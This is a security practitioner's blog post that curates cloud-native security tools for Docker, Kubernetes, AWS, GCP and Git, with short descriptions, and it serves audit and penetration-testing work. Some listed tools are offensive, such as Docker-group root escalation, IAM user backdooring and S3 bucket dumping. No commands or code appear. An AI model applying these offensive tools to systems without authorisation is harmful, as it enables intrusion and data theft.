Reading time ~10 minutes
My Arsenal of Cloud Native (Security) Tools
A while ago I posted “So I Heard You Want to Learn Kubernetes” (part of the “Kubernetes Primer for Security Professionals” series), where I tried to demystify the perception by which Kubernetes is believed to be too hard to even get started, by walking through the journey I undertook to get the basics first, and to focus on its security aspects later.
The natural evolution was to put into practice those concepts, but I quickly realized there was a shortage of resources that gave a comprehensive overview of (offensive) security tooling for that space. As with many topics in this industry, information is often scattered and non-uniform.
@ToniBlyx, in his post “My arsenal of AWS security tools”, gave it a go. That post was indeed the starting point for this one, but I felt the need to personalize that list and to add tools not only for AWS, but also for Docker, Kubernetes, and even Git.
In this post I’ll focus on providing a curated list of tools I personally find useful, alongside a quick “usage” guide for each one of them. I’ve also released an Ansible role for those who want to quickly deploy them.
An Ansible role for (some of) the tools listed in this article can be found on Github: https://github.com/marco-lancini/utils/tree/main/ansible/roles/kali-cloud.
- 20 December 2018: added a new auditing tool for Kubernetes (KubiScan).
- 24 January 2019 && 4 March 2019: added tools for Google Cloud Platform (GCP).
- 2 May 2019: added one new auditing tool for Docker (dive), and two for Kubernetes (kubeaudit, kubesec).
Docker
Auditing Tools
Name | Description |
---|---|
Docker Bench |
Checks for common best-practices around deploying Docker containers in production.
Based on the CIS Docker Community Edition Benchmark v1.1.0.
|
Clair |
Scan Docker images for security vulnerabilities (static analysis). I personally found it not straightforward to setup, so I ended up creating my own docker-compose
to spin up Clair , alongside Postgres
and Klar .
|
Dockscan |
Scan Docker installations for security issues and vulnerabilities.
|
dive |
A tool for exploring each layer in a docker image.
|
Privilege Escalation
Name | Description |
---|---|
dockerrootplease |
Gives you root on the host OS, if you're a member of the "docker" group
|
docker-rootshell | Abuses membership in the "docker" group to drop a root shell in the current working directory. |
docker-escalate | Same concept as above. |
Manual |
|
Kubernetes
Auditing Tools
Name | Description |
---|---|
kube-bench |
Checks whether Kubernetes is deployed according to security best practices.
Based on the CIS Kubernetes Benchmark.
|
kube-hunter | Hunt for security weaknesses in Kubernetes clusters (even remote).
|
KubiScan | Scan for risky permissions and users in Kubernetes Role-Based Access Control (RBAC) authorization model. It can detect accounts which will expose the whole cluster if their identification (JWT token, certificate, etc.) is compromised by an attacker.
|
kubeaudit | Audit clusters against common security controls.
|
kubesec | Quantify risk for Kubernetes resources.
|
kube-auto-analyzer | Configuration analyzer to automate the process of reviewing Kubernetes installations against the CIS Kubernetes Benchmark.
|
AWS
Basic Tools
Name | Description |
---|---|
aws-cli |
Universal Command Line Interface for AWS, used by basically any other tool.
|
aws-shell | Interactive shell for AWS (with autocompletion, etc.). |
Inventory Tools
Name | Description |
---|---|
aws-inventory |
Make an inventory of all your resources across regions.
|
Resource Counter |
Counts number of resources in categories across regions.
|
aws_public_ips |
Fetch all public IP addresses tied to your AWS account.
|
Auditing Tools
Name | Description |
---|---|
CS-Suite |
Auditing the security posture of AWS/GCP/Azure infrastructure. Includes Scout2, Prowler, AWS Trusted Advisor, etc. Permissions required: SecurityAudit
|
CloudSploit |
Returns a series of potential misconfigurations and security risks. Permissions required: SecurityAudit
|
AWS Security Benchmark |
Script to evaluate your AWS account against the full CIS Amazon Web Services Foundations Benchmark 1.1.
|
S3Scan |
Generate a report of all S3 buckets and their permissions (authenticated).
|
CloudMapper |
Analyze AWS environments by creating network diagrams (and more). Permissions required: ReadOnlyAccess, SecurityAudit
|
PMapper |
Advanced and Automated AWS IAM Evaluation. Permissions required: ReadOnlyAccess
|
Security auditing. Already included in CS-Suite .Permissions required: ReadOnlyAccess, SecurityAudit
|
|
CIS benchmarks and additional checks for security best practices in AWS. Already included in CS-Suite .Permissions required: SecurityAudit
|
Offensive Tools
Name | Description |
---|---|
Pacu |
AWS penetration testing toolkit, designed for offensive security testing against cloud environments.
Current modules enable a range of attacks, including user privilege escalation, backdooring of IAM users, attacking vulnerable Lambda functions, etc.
|
Nimbostratus |
Tools for fingerprinting and exploiting Amazon cloud infrastructures.
|
weirdALL |
AWS Attack Library.
|
S3Scanner |
Scan for open AWS S3 buckets and dump the contents.
|
Cloudjack |
CloudJack assesses AWS accounts for subdomain hijacking vulnerabilities as a result of decoupled Route53 and CloudFront configurations.
|
AWS PWN |
A collection of AWS penetration testing scripts:
|
Training Apps
Name | Description |
---|---|
flAWS | Challenge that, through a series of levels, teaches common mistakes and gotchas when using AWS.
It also has some "public" credentials you can use to try your tools against:
|
Cloudgoat | Vulnerable by Design AWS infrastructure setup tool. There are also some writeups available. |
DVCA | Damn Vulnerable Cloud Application. |
nimbostratus-target | This repository holds a target infrastructure you can use for testing nimbostratus. |
GCP
Basic Tools
Name | Description |
---|---|
gcloud |
Command Line Interface for GCP.
|
Auditing Tools
Name | Description |
---|---|
G-Scout |
Auditing GCP configurations. Permissions required on the projects: Viewer, Security Reviewer, Stackdriver Account Viewer
|
ScoutSuite |
Multi-cloud security auditing tool. Permissions required on the projects: Viewer, Security Reviewer, Stackdriver Account Viewer
|
gcp-audit |
Takes a set of projects and audits them for common issues as defined by its ruleset.
|
gcp-iam-collector |
Python script for collecting and visualising Google Cloud Platform IAM permissions.
|
Auditing the security posture of AWS/GCP/Azure infrastructure. Can be overlooked as it relies on G-Scout. Permissions required on the projects: Viewer, Security Reviewer, Stackdriver Account Viewer
|
Offensive Tools
Name | Description |
---|---|
GCPBucketBrute |
Enumerate Google Storage buckets, determine what access you have to them, and determine if they can be privilege escalated.
|
GIT
Name | Description |
---|---|
git-secrets | Prevents you from committing secrets and credentials into git repositories. |
Gitrob | Reconnaissance tool for GitHub organizations.
|
Gitleaks | Searches full repo history for secrets and keys. |
TruffleHog | Searches through git repositories for high entropy strings and secrets. |